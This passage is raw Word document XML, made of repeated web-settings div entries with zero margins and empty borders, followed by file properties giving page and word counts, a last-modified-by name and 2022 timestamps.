        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="495807546">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="597107113">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633945612">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="738746003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="750195101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="751706886">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="810632242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="823275826">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="862673074">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="875893181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="927537567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="927617694">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="975793246">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="977800634">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="984502934">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1000083727">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1005858383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1058088693">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1095983360">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1145780299">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1172333013">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1237398604">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1659068082">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1699814100">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1723407375">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1771855155">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1858618949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1884095242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1933661309">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1945186677">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1963344624">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1967350483">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1988821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32</Pages>
  <Words>5853</Words>
  <Characters>33365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Aponte, Raymond</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-11T21:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-12T04:08:00Z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